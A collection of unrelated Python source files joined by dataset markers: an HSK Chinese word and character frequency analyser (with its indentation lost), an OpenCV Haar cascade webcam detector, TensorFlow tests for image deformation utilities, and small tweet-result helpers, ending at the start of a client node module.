textareatemplate = u"""<textarea name="{}" cols="40" rows="12">{}</textarea>"""
def analysewords(results, words, chars, hskwordcount, hskcharcount):
results.append("<h3>Analysis of Words/Characters in Input</h3>")
singlecharcount = len([w for w in words if len(w) == 1])
wordcount = len(words)
charcount = len(chars)
totalwords = sum(hskwordcount.values())
totalchars = sum(hskcharcount.values())
results.append(u"""Input contained:<ul>
<li>{} unique single-character words</li>
<li>{} unique multi-character words</li>
<li>{} unique words</li>
<li>{} unique characters</li>
<li>{} total words</li>
<li>{} total characters</li>
</ul>""".format(singlecharcount, wordcount-singlecharcount, wordcount, charcount, totalwords, totalchars))
wordsknown = u"\n".join(freqorder_word(words))
charsknown = u"\n".join(freqorder_char(chars))
results.append(blockboxtemplate().format("Unique Words", "wordsknown", wordsknown))
results.append(blockboxtemplate().format("Unique Characters", "charsknown", charsknown))
def analysehskwords(results, words, hskwordcount):
knownintersect = {}
results.append("<h3>Analysis of HSK Words in Input</h3>")
results.append("Input contained:<ul>")
cumulativeknown = {}
cumulativetotal = {}
cumulativeknown[0] = 0
cumulativetotal[0] = 0
numknown = {}
numhsk = {}
for i in range(1, 7):
knownintersect[i] = words & hskwords[i]
numknown[i] = len(knownintersect[i])
numhsk[i] = len(hskwords[i])
percentknown = 100 * float(numknown[i]) / numhsk[i]
cumulativeknown[i] = cumulativeknown[i-1] + numknown[i]
cumulativetotal[i] = cumulativetotal[i-1] + numhsk[i]
results.append(u"""<li>{} ({:.2f}%) of the {} HSK {} words""".format(numknown[i], percentknown, numhsk[i], i))
if i > 1 > 0:
cumpercentknown = 100 * float(cumulativeknown[i]) / cumulativetotal[i]
results.append(u""" <i>(Cumulative: {} ({:.2f}%) of the {} HSK 1-{} words)</i>""".format(cumulativeknown[i], cumpercentknown, cumulativetotal[i], i))
results.append("</li>")
results.append("</ul>")
totalunique = len(words)
if totalunique > 0:
numknown_nonhsk = totalunique - cumulativeknown[6]
results.append("Of the {} <b>unique</b> words in the input:<ul>".format(totalunique))
for i in range(1, 7):
percentknown = 100 * float(numknown[i]) / totalunique
results.append(u"""<li>{} ({:.2f}%) were HSK {} words""".format(numknown[i], percentknown, i))
if i > 1:
cumpercentknown = 100 * float(cumulativeknown[i]) / totalunique
results.append(u"""<i>(Cumulative: {} ({:.2f}%) were HSK 1-{} words)</i>""".format(cumulativeknown[i], cumpercentknown, i))
results.append("</li>")
numknown_nonhsk_percent = 100 * float(numknown_nonhsk) / totalunique
results.append(u"""<li>{} ({:.2f}%) were non-HSK words</li>""".format(numknown_nonhsk, numknown_nonhsk_percent))
results.append("</ul>")
totalwords = sum(hskwordcount.values())
if totalwords == totalunique:
results.append("<p><i>Each word appeared only once in the input.</i></p>")
else:
cumknown = 0
results.append("Of the {} <b>total</b> words that were input:<ul>".format(totalwords))
for i in range(1, 7):
percentknown = 100 * float(hskwordcount[i]) / totalwords
cumknown += hskwordcount[i]
results.append(u"""<li>{} ({:.2f}%) were HSK {} words""".format(hskwordcount[i], percentknown, i))
if i > 1:
cumpercentknown = 100 * float(cumknown) / totalwords
results.append(u"""<i>(Cumulative: {} ({:.2f}%) were HSK 1-{} words)</i>""".format(cumknown, cumpercentknown, i))
results.append("</li>")
num_nonhsk = totalwords - cumknown
numknown_nonhsk_percent = 100 * float(num_nonhsk) / totalwords
results.append(u"""<li>{} ({:.2f}%) were non-HSK words</li>""".format(num_nonhsk, numknown_nonhsk_percent))
results.append("</ul>")
for i in range(1, 7):
wordsknown = u"\n".join(freqorder_word(knownintersect[i]))
results.append(blockboxtemplate().format("HSK " + str(i), "hskwordsknown" + str(i), wordsknown))
nonhskwords = u"\n".join(freqorder_word(words - hskwords[16]))
results.append(blockboxtemplate().format("Non-HSK", "nonhskwordsknown", nonhskwords))
def analysehskchars(results, chars, hskcharcount):
knownintersect = {}
results.append("<h3>Analysis of HSK Characters in Input</h3>")
results.append("Input contained:<ul>")
cumulativeknown = {}
cumulativetotal = {}
cumulativeknown[0] = 0
cumulativetotal[0] = 0
numknown = {}
numhsk = {}
for i in range(1, 7):
knownintersect[i] = chars & hskchars[i]
numknown[i] = len(knownintersect[i])
numhsk[i] = len(hskchars[i])
percentknown = 100 * float(numknown[i]) / numhsk[i]
cumulativeknown[i] = cumulativeknown[i-1] + numknown[i]
cumulativetotal[i] = cumulativetotal[i-1] + numhsk[i]
results.append(u"""<li>{} ({:.2f}%) of the {} HSK {} characters""".format(numknown[i], percentknown, numhsk[i], i))
if i > 1 > 0:
cumpercentknown = 100 * float(cumulativeknown[i]) / cumulativetotal[i]
results.append(u""" <i>(Cumulative: {} ({:.2f}%) of the {} HSK 1-{} characters)</i>""".format(cumulativeknown[i], cumpercentknown, cumulativetotal[i], i))
results.append("</li>")
results.append("</ul>")
totalunique = len(chars)
if totalunique > 0:
numknown_nonhsk = totalunique - cumulativeknown[6]
results.append("Of the {} <b>unique</b> characters in the input:<ul>".format(totalunique))
for i in range(1, 7):
percentknown = 100 * float(numknown[i]) / totalunique
results.append(u"""<li>{} ({:.2f}%) were HSK {} characters""".format(numknown[i], percentknown, i))
if i > 1:
cumpercentknown = 100 * float(cumulativeknown[i]) / totalunique
results.append(u"""<i>(Cumulative: {} ({:.2f}%) were HSK 1-{} characters)</i>""".format(cumulativeknown[i], cumpercentknown, i))
results.append("</li>")
numknown_nonhsk_percent = 100 * float(numknown_nonhsk) / totalunique
results.append(u"""<li>{} ({:.2f}%) were non-HSK characters</li>""".format(numknown_nonhsk, numknown_nonhsk_percent))
results.append("</ul>")
totalchars = sum(hskcharcount.values())
if totalchars == totalunique:
results.append("<p><i>Each character appeared only once in the input.</i></p>")
else:
cumknown = 0
results.append("Of the {} <b>total</b> characters that were input:<ul>".format(totalchars))
for i in range(1, 7):
percentknown = 100 * float(hskcharcount[i]) / totalchars
cumknown += hskcharcount[i]
results.append(u"""<li>{} ({:.2f}%) were HSK {} characters""".format(hskcharcount[i], percentknown, i))
if i > 1:
cumpercentknown = 100 * float(cumknown) / totalchars
results.append(u"""<i>(Cumulative: {} ({:.2f}%) were HSK 1-{} characters)</i>""".format(cumknown, cumpercentknown, i))
results.append("</li>")
num_nonhsk = totalchars - cumknown
numknown_nonhsk_percent = 100 * float(num_nonhsk) / totalchars
results.append(u"""<li>{} ({:.2f}%) were non-HSK characters</li>""".format(num_nonhsk, numknown_nonhsk_percent))
results.append("</ul>")
for i in range(1, 7):
charsknown = u"\n".join(freqorder_char(knownintersect[i]))
results.append(blockboxtemplate().format("HSK " + str(i), "hskcharsknown" + str(i), charsknown))
nonhskchars = u"\n".join(freqorder_char(chars - hskchars[16]))
results.append(blockboxtemplate().format("Non-HSK", "nonhskcharsknown", nonhskchars))
def suggesthskwords(results, words, chars):
results.append("""<h3>Suggested HSK Words not in Input</h3>""")
for i in range(1, 7):
wordstolearn = u"\n".join(freqorder_word(hskwords[i] - words))
results.append(blockboxtemplate().format("HSK " + str(i), "hskwordstolearn" + str(i), wordstolearn))
foundwords = []
for freq, word in word_freq_ordered:
if word not in words and word not in hskwords[16]:
foundwords.append(word)
if len(foundwords)>=1000:
break
wordstext = u"\n".join(freqorder_word(foundwords))
results.append(blockboxtemplate().format("Non-HSK", "nonhskwordstolearn" + str(i), wordstext))
def suggesthskchars(results, words, chars):
results.append("""<h3>Suggested HSK Characters not in Input</h3>""")
for i in range(1, 7):
charstolearn = u"\n".join(freqorder_char(hskchars[i] - chars))
results.append(blockboxtemplate().format("HSK " + str(i), "hskcharstolearn" + str(i), charstolearn))
foundchars = []
for freq, char in char_freq_ordered:
if char not in chars and char not in hskchars[16]:
foundchars.append(char)
if len(foundchars)>=1000:
break
charstext = u"\n".join(freqorder_char(foundchars))
results.append(blockboxtemplate().format("Non-HSK", "nonhskcharstolearn" + str(i), charstext))
def suggestfreqwords(results, words, chars):
results.append("""<h3>Suggested Words not in Input</h3>""")
foundwords = []
for freq, word in word_freq_ordered:
if word not in words:
foundwords.append(word)
if len(foundwords)>=1000:
break
wordstext = u"\n".join(freqorder_word(foundwords))
results.append(textareatemplate.format("highfreqwords", wordstext))
def suggestfreqwordsre(results, words, chars):
results.append("""<h3>Suggested Words Using Characters in Input</h3>""")
foundwords = []
for freq, word in word_freq_ordered:
if word not in words:
allcharsmatch = True
for char in word:
if char not in chars:
allcharsmatch = False
break
if not allcharsmatch:
continue
foundwords.append(word)
if len(foundwords)>=1000:
break
wordstext = u"\n".join(freqorder_word(foundwords))
results.append(textareatemplate.format("highfreqwordsreuse", wordstext))
def suggestfreqchars(results, words, chars):
results.append("""<h3>Suggested Characters not in Input</h3>""")
foundchars = []
for freq, char in char_freq_ordered:
if char not in chars:
foundchars.append(char)
if len(foundchars)>=1000:
break
charstext = u"\n".join(freqorder_char(foundchars))
results.append(textareatemplate.format("highfreqchars", charstext))
init_done = False;
# ================
# Initialise
def init_resources():
global init_done, zh_punctuation
if init_done:
return;
parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L1.txt", 1)
parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L2.txt", 2)
parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L3.txt", 3)
parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L4.txt", 4)
parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L5.txt", 5)
parse_hsk_file("/home/hskhsk/data/HSK Official With Definitions 2012 L6.txt", 6)
build_hsk_extralists(hskwords, hskchars)
parse_hsk_2010_file("/home/hskhsk/data/New_HSK_2010.csv")
build_hsk_extralists(hskwords2010, hskchars2010)
parse_word_freq_file("/home/hskhsk/data/SUBTLEX-CH-WF.txt")
parse_char_freq_file("/home/hskhsk/data/SUBTLEX-CH-CHR.txt")
init_done = True;
# ================
# Parse Hanzi input
def parseblock(hanzi, notes):
hskwordcount = {}
hskcharcount = {}
hskwordcount[0] = hskwordcount[1] = hskwordcount[2] = hskwordcount[3] = hskwordcount[4] = hskwordcount[5] = hskwordcount[6] = 0
hskcharcount[0] = hskcharcount[1] = hskcharcount[2] = hskcharcount[3] = hskcharcount[4] = hskcharcount[5] = hskcharcount[6] = 0
words = set()
chars = set()
overlaps = set()
ignorechars = set()
unknownchars = set()
for chunk in hanzi.split():
lastfoundend=-1
lastfoundword = ""
for i in range(len(chunk)+1):
maxfound = 0
foundword = ""
for j in range(1, min(6, len(chunk)-i+1)):
testword = chunk[i:i+j]
if testword in word_freq and i+j>lastfoundend:
maxfound = j
foundword = testword
if maxfound > 0:
if lastfoundend > i and i+maxfound > lastfoundend and (lastfoundword, foundword) not in overlaps:
notes.append(u"Overlapping words, added both: {} and {}".format(lastfoundword, foundword))
overlaps.add( (lastfoundword,foundword) )
if i+maxfound > lastfoundend:
lastfoundword = foundword
lastfoundend = i+maxfound
words.add(foundword)
hskwordcount[query_hsk_word_level(foundword)] += 1
for char in chunk:
if char_is_ok(char):
chars.add(char)
hskcharcount[query_hsk_char_level(char)] += 1
if char not in char_freq:
unknownchars.add(char)
else:
ignorechars.add(char)
if len(ignorechars):
notes.append("Ignored characters: " + u", ".join(list(ignorechars)))
if len(unknownchars):
notes.append("Unknown characters: " + u", ".join(list(unknownchars)))
return words, chars, hskwordcount, hskcharcount
def parselist(hanzi, notes):
hskwordcount = {}
hskcharcount = {}
hskwordcount[0] = hskwordcount[1] = hskwordcount[2] = hskwordcount[3] = hskwordcount[4] = hskwordcount[5] = hskwordcount[6] = 0
hskcharcount[0] = hskcharcount[1] = hskcharcount[2] = hskcharcount[3] = hskcharcount[4] = hskcharcount[5] = hskcharcount[6] = 0
words = set()
chars = set()
ignorewords = set()
ignorechars = set()
unknownwords = set()
unknownchars = set()
for line in hanzi.split(u"\n"):
chunks = line.split()
if len(chunks):
word = chunks[0]
if len([c for c in word if not char_is_ok(c)]) == 0:
words.add(word)
hskwordcount[query_hsk_word_level(word)] += 1
if word not in word_freq:
unknownwords.add(word)
else:
ignorewords.add(word)
for char in word:
if char_is_ok(char):
chars.add(char)
hskcharcount[query_hsk_char_level(char)] += 1
if char not in char_freq:
unknownchars.add(char)
else:
ignorechars.add(char)
if len(ignorewords):
notes.append("Ignored words: " + u", ".join(list(ignorewords)))
if len(ignorechars):
notes.append("Ignored characters: " + u", ".join(list(ignorechars)))
if len(unknownwords):
notes.append("Unknown words: " + u", ".join(list(unknownwords)))
if len(unknownchars):
notes.append("Unknown characters: " + u", ".join(list(unknownchars)))
return words, chars, hskwordcount, hskcharcount
# ================
# Utilities for freq order
def freqorder_word(hanzi):
freqlist = [(query_word_freq(h), h) for h in hanzi]
freqlist.sort()
freqlist.reverse()
if getform("addfreqindex") and getform("addfreqvalue"):
return [u"{}\t{}\t{}".format(h, query_word_freq_index(h), f) for f, h in freqlist]
elif getform("addfreqindex"):
return [u"{}\t{}".format(h, query_word_freq_index(h)) for f, h in freqlist]
elif getform("addfreqvalue"):
return [u"{}\t{}".format(h, f) for f, h in freqlist]
else:
return [h for f, h in freqlist]
def freqorder_char(hanzi):
freqlist = [(query_char_freq(h), h) for h in hanzi]
freqlist.sort()
freqlist.reverse()
if getform("addfreqindex") and getform("addfreqvalue"):
return [u"{}\t{}\t{}".format(h, query_char_freq_index(h), f) for f, h in freqlist]
elif getform("addfreqindex"):
return [u"{}\t{}".format(h, query_char_freq_index(h)) for f, h in freqlist]
elif getform("addfreqvalue"):
return [u"{}\t{}".format(h, f) for f, h in freqlist]
else:
return [h for f, h in freqlist]
def hanzideflink(hanzi):
url = u"http://www.mdbg.net/chindict/chindict.php?wdqb=" + urllib.quote(hanzi.encode('utf-8'))
return u"""<a class="definition" href="{}">{}</a>""".format(url, hanzi)
def freqorder_word_link(hanzi):
freqlist = [(query_word_freq(h), h) for h in hanzi]
freqlist.sort()
freqlist.reverse()
return [hanzideflink(h) for f, h in freqlist]
def freqorder_char_link(hanzi):
freqlist = [(query_char_freq(h), h) for h in hanzi]
freqlist.sort()
freqlist.reverse()
return [hanzideflink(h) for f, h in freqlist]
def char_is_ok(char):
if ord(char) < 128:
return False # ignore ASCII
if ord(char) >= 0x2000 and ord(char) <= 0x206F:
return False # ignore General punctuation
if ord(char) >= 0x3000 and ord(char) <= 0x303F:
return False # ignore Chinese punctuation
if ord(char) >= 0xFF00 and ord(char) <= 0xFFEF:
return False # ignore full width and half width forms
return True
# ================
# HSK Parsing
hsk_word_level = {} # {"A" : 1, "ABC" : 1 }
hsk_char_level = {} # {"A" : 1, "B" : 1 , "C" : 1}
hskwords = {} # {1 : set("A", "ABC"), ...}
hskchars = {}
hskwords2010 = {} # {1 : set("A", "ABC"), ...}
hskchars2010 = {}
def query_hsk_word_level(somehanzi):
level = 0
if somehanzi in hsk_word_level:
level = hsk_word_level[somehanzi]
return level
def query_hsk_char_level(somehanzi):
level = 0
if somehanzi in hsk_char_level:
level = hsk_char_level[somehanzi]
return level
# parse newer 2012 HSK format
def parse_hsk_file(infilename, hsklevel):
hskwords[hsklevel] = set()
infile = codecs.open(infilename, 'r', "utf-8")
for line in infile:
splitted = line.strip().split("\t")
if len(splitted) >= 4:
word = unicodedata.normalize("NFKC", splitted[0].strip()).replace(u'\ufeff',"")
if word != "":
hskwords[hsklevel].add(word)
if word in hsk_word_level:
hsk_word_level[word] = min(hsk_word_level[word], hsklevel)
else:
hsk_word_level[word] = hsklevel
for somehanzi in word:
if somehanzi in hsk_char_level:
hsk_char_level[somehanzi] = min(hsk_char_level[somehanzi], hsklevel)
else:
hsk_char_level[somehanzi] = hsklevel
infile.close()
def build_hsk_extralists(words, chars):
# build a list of characters from the words lists
for i in range(1, 7):
chars[i] = set()
for word in words[i]:
for char in word:
chars[i].add(char)
chars[2] = chars[2] - chars[1]
chars[3] = chars[3] - chars[2] - chars[1]
chars[4] = chars[4] - chars[3] - chars[2] - chars[1]
chars[5] = chars[5] - chars[4] - chars[3] - chars[2] - chars[1]
chars[6] = chars[6] - chars[5] - chars[4] - chars[3] - chars[2] - chars[1]
# build lists of character/word ranges; e.g. words[13] is the
# union of the words for HSK levels 1, 2, and 3.
for i in range(1, 6):
for j in range (i+1, 7):
words[i*10 + j] = words[i]
chars[i*10 + j] = chars[i]
for k in range (i+1, j+1):
words[i*10 + j] = words[i*10 + j].union(words[k])
chars[i*10 + j] = chars[i*10 + j].union(chars[k])
def parse_hsk_2010_file(infilename):
infile = codecs.open(infilename, 'r', "utf-8")
hskwords2010[1] = set()
hskwords2010[2] = set()
hskwords2010[3] = set()
hskwords2010[4] = set()
hskwords2010[5] = set()
hskwords2010[6] = set()
for line in infile:
splitted = line.split(",")
if len(splitted) > 1:
hsklevel = int(splitted[0].strip().replace(u'\ufeff',""))
word = unicodedata.normalize("NFKC", splitted[1].strip()).replace(u'\ufeff',"")
if word != "":
hskwords2010[hsklevel].add(word)
infile.close()
# ================
# Frequency parsing
word_freq = {} # {"AB" : 1234, ...}
char_freq = {} # {"A" : 6789, ...}
word_freq_index = {} # {"AB" : 1, ...}
char_freq_index = {} # {"A" : 1, ...}
word_freq_ordered = [] # [(1234, "AB"), ...] # sorted by descending frequency
char_freq_ordered = [] # [(1234, "A"), ...] # sorted by descending frequency
# don't do anything fancy here, no point - want to show the actual freq
def query_word_freq(somehanzi):
if somehanzi in word_freq:
return word_freq[somehanzi]
return 0
def query_char_freq(char):
if char in char_freq:
return char_freq[char]
return 0
def query_word_freq_index(word):
if word in word_freq_index:
return word_freq_index[word]
return 0
def query_char_freq_index(char):
if char in char_freq_index:
return char_freq_index[char]
return 0
# parse SUBTLEX word frequency
def parse_word_freq_file(infilename):
infile = codecs.open(infilename, 'r', "utf-8")
freq_index = 1
for line in infile:
splitted = line.strip().split("\t")
if len(splitted) == 7:
word = unicodedata.normalize("NFKC", splitted[0].strip()).replace(u'\ufeff',"")
freq = int(splitted[1].strip())
if word != "" and freq > 0:
word_freq[word] = freq
word_freq_index[word] = freq_index
freq_index += 1
for word, freq in word_freq.iteritems():
word_freq_ordered.append( (freq, word) )
word_freq_ordered.sort()
word_freq_ordered.reverse()
infile.close()
# parse SUBTLEX char frequency
def parse_char_freq_file(infilename):
infile = codecs.open(infilename, 'r', "utf-8")
freq_index = 1
for line in infile:
splitted = line.strip().split("\t")
if len(splitted) == 7:
char = unicodedata.normalize("NFKC", splitted[0].strip()).replace(u'\ufeff',"")
freq = int(splitted[1].strip())
if char != "" and freq > 0:
char_freq[char] = freq
char_freq_index[char] = freq_index
freq_index += 1
for char, freq in char_freq.iteritems():
char_freq_ordered.append( (freq, char) )
char_freq_ordered.sort()
char_freq_ordered.reverse()
infile.close()
| StarcoderdataPython |
1771605 | import cv2
from basecam import BaseCam
from util import apply_doc, get_cascade_file_path, is_escape, wait_frames
class HaarCam(BaseCam):
"""
Webcam that performs Haar Cascade object detection on the video stream.
"""
@apply_doc(BaseCam.__init__)
def __init__(self, window):
super(HaarCam, self).__init__(window)
self._face_classifier = self._init_classifier("haarcascade_frontalface_default.xml")
self._fullbody_classifier = self._init_classifier("haarcascade_fullbody.xml")
self._lowerbody_classifier = self._init_classifier("haarcascade_lowerbody.xml")
self._upperbody_classifier = self._init_classifier("haarcascade_upperbody.xml")
def detect_parts(self, img, classifier):
"""
Detect anatomical parts in ``img`` with Haar Cascade object detection.
:param img: Image read from webcam.
:param classifier: Classifier to detect anatomical parts.
"""
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
parts = classifier.detectMultiScale(gray, 1.3, 5)
for x, y, w, h in parts:
cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), thickness=2)
return img
@apply_doc(BaseCam.run)
def run(self, frame_throttle, classifier=None):
"""
:param classifier: Classifier to detect anatomical parts. Defaults \
to a face classifier if ``None``.
"""
if classifier is None:
classifier = self.face_classifier
try:
for _ in wait_frames(throttle=frame_throttle):
ret_val, img = self.cam.read()
detected = self.detect_parts(img, classifier)
cv2.imshow(self.window, detected)
# esc to quit
if is_escape(cv2.waitKey(1)):
break
finally:
cv2.destroyWindow(self.window)
@property
def face_classifier(self):
"""
Get a face classifier.
"""
return self._face_classifier
@property
def fullbody_classifier(self):
"""
Get a full body classifier.
"""
return self._fullbody_classifier
@property
def lowerbody_classifier(self):
"""
Get a lower body classifier.
"""
return self._lowerbody_classifier
@property
def upperbody_classifier(self):
"""
Get an upper body classifier.
"""
return self._upperbody_classifier
def _init_classifier(self, cascade_file):
"""
Initialize a Haar Cascade Classifier.
:param cascade_file: Name of cascade file in the ``xmls`` directory.
"""
return cv2.CascadeClassifier(get_cascade_file_path(cascade_file))
def main():
h = HaarCam("haarcam")
h.run(frame_throttle=10)
if __name__ == "__main__":
main()
| StarcoderdataPython |
1715579 | # Lint as: python2, python3
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf
from multidim_image_augmentation import deformation_utils
_ARRAY_COMPARE_TOLERANCE = 1e-5
class ControlGridTest(tf.test.TestCase):
def test_create_control_grid_for_cubic_interp_2d(self):
with self.session():
grid = deformation_utils.create_control_grid_for_cubic_interp(
transformed_image_shape=[20, 30],
transformed_image_spacings_um=tf.constant([0.1, 0.1]),
control_grid_spacings_pix=[9, 9])
self.assertAllEqual([6, 8, 2], grid.eval().shape)
def test_create_control_grid_for_cubic_interp_3d(self):
with self.session():
grid = deformation_utils.create_control_grid_for_cubic_interp(
transformed_image_shape=[10, 20, 30],
transformed_image_spacings_um=tf.constant([0.1, 0.1, 0.1]),
control_grid_spacings_pix=[9, 9, 9])
self.assertAllEqual([4, 6, 8, 3], grid.eval().shape)
def test_create_control_grid_for_cubic_interp_3d_single_slice(self):
with self.session():
grid = deformation_utils.create_control_grid_for_cubic_interp(
transformed_image_shape=[1, 20, 30],
transformed_image_spacings_um=tf.constant([0.1, 0.1, 0.1]),
control_grid_spacings_pix=[1, 9, 9])
self.assertAllEqual([3, 6, 8, 3], grid.eval().shape)
class Create2DDeformationFieldTest(tf.test.TestCase):
def test_applies_cropping_offset(self):
deformation_field = deformation_utils.create_2d_deformation_field(
raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
raw_image_element_size_um=tf.constant([1.0, 1.0]),
net_input_spatial_shape=[3, 3],
net_input_element_size_um=tf.constant([1.0, 1.0]),
control_grid_spacings_pix=[2.0, 2.0],
deformations_magnitudes_um=tf.constant([0.0, 0.0]),
rotation_angle=tf.constant(0.0),
scale_factors=tf.constant([1.0, 1.0]),
mirror_factors=tf.constant([1, 1]),
shearing_coefs=tf.constant([0.0, 0.0]),
cropping_offset_pix=tf.constant([2.0, 3.0]))
expected_output = np.array([[[2, 3], [2, 4], [2, 5]],
[[3, 3], [3, 4], [3, 5]],
[[4, 3], [4, 4], [4, 5]]])
with self.session() as sess:
np.testing.assert_allclose(
expected_output,
sess.run(deformation_field),
atol=_ARRAY_COMPARE_TOLERANCE)
def test_applies_rotation(self):
deformation_field = deformation_utils.create_2d_deformation_field(
raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
raw_image_element_size_um=tf.constant([1.0, 1.0]),
net_input_spatial_shape=[3, 3],
net_input_element_size_um=tf.constant([1.0, 1.0]),
control_grid_spacings_pix=[2.0, 2.0],
deformations_magnitudes_um=tf.constant([0.0, 0.0]),
rotation_angle=tf.constant(np.pi / 4.),
scale_factors=tf.constant([1.0, 1.0]),
mirror_factors=tf.constant([1, 1]),
shearing_coefs=tf.constant([0.0, 0.0]),
cropping_offset_pix=tf.constant([0.0, 0.0]))
expected_output = np.array([[[-0.4142135624, 1.],
[0.2928932188, 1.7071067812],
[1., 2.4142135624]],
[[0.2928932188, 0.2928932188],
[1., 1.],
[1.7071067812, 1.7071067812]],
[[1., -0.4142135624],
[1.7071067812, 0.2928932188],
[2.4142135624, 1]]])
with self.session() as sess:
np.testing.assert_allclose(
expected_output,
sess.run(deformation_field),
atol=_ARRAY_COMPARE_TOLERANCE)
def test_applies_shear(self):
deformation_field = deformation_utils.create_2d_deformation_field(
raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
raw_image_element_size_um=tf.constant([1.0, 1.0]),
net_input_spatial_shape=[3, 3],
net_input_element_size_um=tf.constant([1.0, 1.0]),
control_grid_spacings_pix=[2.0, 2.0],
deformations_magnitudes_um=tf.constant([0.0, 0.0]),
rotation_angle=tf.constant(0.0),
scale_factors=tf.constant([1.0, 1.0]),
mirror_factors=tf.constant([1, 1]),
shearing_coefs=tf.constant([0.0, 0.1]),
cropping_offset_pix=tf.constant([0.0, 0.0]))
expected_output = np.array([[[-0.1, 0], [0, 1], [0.1, 2]],
[[0.9, 0], [1, 1], [1.1, 2]],
[[1.9, 0], [2, 1], [2.1, 2]]])
with self.session() as sess:
np.testing.assert_allclose(
expected_output,
sess.run(deformation_field),
atol=_ARRAY_COMPARE_TOLERANCE)
def test_applies_mirror(self):
deformation_field = deformation_utils.create_2d_deformation_field(
raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
raw_image_element_size_um=tf.constant([1.0, 1.0]),
net_input_spatial_shape=[3, 3],
net_input_element_size_um=tf.constant([1.0, 1.0]),
control_grid_spacings_pix=[2.0, 2.0],
deformations_magnitudes_um=tf.constant([0.0, 0.0]),
rotation_angle=tf.constant(0.0),
scale_factors=tf.constant([1.0, 1.0]),
mirror_factors=tf.constant([-1, 1]),
shearing_coefs=tf.constant([0.0, 0.0]),
cropping_offset_pix=tf.constant([0.0, 0.0]))
expected_output = np.array([[[2., 0.], [2., 1.], [2., 2.]],
[[1., 0.], [1., 1.], [1., 2.]],
[[0., 0.], [0., 1.], [0., 2.]]])
with self.session() as sess:
np.testing.assert_allclose(
expected_output,
sess.run(deformation_field),
atol=_ARRAY_COMPARE_TOLERANCE)
def test_applies_scale(self):
deformation_field = deformation_utils.create_2d_deformation_field(
raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
raw_image_element_size_um=tf.constant([1.0, 1.0]),
net_input_spatial_shape=[3, 3],
net_input_element_size_um=tf.constant([1.0, 1.0]),
control_grid_spacings_pix=[2.0, 2.0],
deformations_magnitudes_um=tf.constant([0.0, 0.0]),
rotation_angle=tf.constant(0.0),
scale_factors=tf.constant([2.0, 1.0]),
mirror_factors=tf.constant([1, 1]),
shearing_coefs=tf.constant([0.0, 0.0]),
cropping_offset_pix=tf.constant([0.0, 0.0]))
expected_output = np.array([[[-1., 0.], [-1., 1.], [-1., 2.]],
[[1., 0.], [1., 1.], [1., 2.]],
[[3., 0.], [3., 1.], [3., 2.]]])
with self.session() as sess:
np.testing.assert_allclose(
expected_output,
sess.run(deformation_field),
atol=_ARRAY_COMPARE_TOLERANCE)
def test_applies_multiple_transforms_together(self):
deformation_field = deformation_utils.create_2d_deformation_field(
raw_image_center_pos_pix=tf.constant([1.0, 1.0]),
raw_image_element_size_um=tf.constant([1.0, 1.0]),
net_input_spatial_shape=[3, 3],
net_input_element_size_um=tf.constant([1.0, 1.0]),
control_grid_spacings_pix=[2.0, 2.0],
deformations_magnitudes_um=tf.constant([0.0, 0.0]),
rotation_angle=tf.constant(np.pi / 2.),
scale_factors=tf.constant([1.0, 2.0]),
mirror_factors=tf.constant([1, -1]),
shearing_coefs=tf.constant([0.1, 0.0]),
cropping_offset_pix=tf.constant([3.0, 5.0]))
expected_output = np.array([[[3., 3.9], [4., 4.], [5., 4.1]],
[[3., 5.9], [4., 6.], [5., 6.1]],
[[3., 7.9], [4., 8.], [5., 8.1]]])
with self.session() as sess:
np.testing.assert_allclose(
expected_output,
sess.run(deformation_field),
atol=_ARRAY_COMPARE_TOLERANCE)
def test_oddEvenErrorHandling(self):
with tf.Session():
deform = deformation_utils.create_2d_deformation_field(
np.array([101, 101]) / 2,
raw_image_element_size_um=tf.constant([1., 1.]),
net_input_spatial_shape=[50, 101],
net_input_element_size_um=tf.constant([2., 1.]),
control_grid_spacings_pix=[10, 10],
deformations_magnitudes_um=tf.constant((0., 0.)),
rotation_angle=tf.constant(0.),
scale_factors=tf.constant((1., 1.)),
mirror_factors=tf.constant((1., 1.)),
shearing_coefs=tf.constant((0., 0., 0., 0.)),
cropping_offset_pix=tf.constant((0., 0.)))
with self.assertRaisesWithPredicateMatch(
tf.errors.InvalidArgumentError,
"factor must be odd as input and output size is even"):
deform.eval()
if __name__ == "__main__":
tf.test.main()
| StarcoderdataPython |
4814633 | <reponame>AdamSwenson/TwitterProject
"""
This contains various simple datastructures which the various tools use.
It does not contain ORM classes.
Created by adam on 11/6/16
"""
__author__ = 'adam'
from collections import namedtuple
Result = namedtuple('Result', ['sentence_index', 'word_index', 'text', 'id', 'type'])
#
# # This should become the default result since it can
# # be used for tweets or users
# GeneralResult = namedtuple('GeneralResult', ['sentence_index', 'word_index', 'text', 'obj_id'])
def is_result(r):
"""Tests for whether the item is either a Result or GeneralResult"""
if isinstance(r, Result): # or isinstance(r, GeneralResult):
return True
return False
def make_tweet_result(sentenceIndex, wordIndex, text, tweetId):
"""Creates and returns a Result object"""
if text is not None:
if tweetId is not None:
return Result(sentenceIndex, wordIndex, text, tweetId, 'tweet')
def make_user_result(sentenceIndex, wordIndex, text, userId):
"""Creates and returns a Result object"""
if text is not None:
return Result(sentenceIndex, wordIndex, text, userId, 'user')
| StarcoderdataPython |
1786976 | <reponame>M4gicT0/Distribute<filename>slave/client_node.py<gh_stars>0
import sys
import json
import netifaces as ni
from node import Node
from lead import LeadNode
from rpc_server import Server
import time
from uuid import getnode as get_mac
class ClientNode:
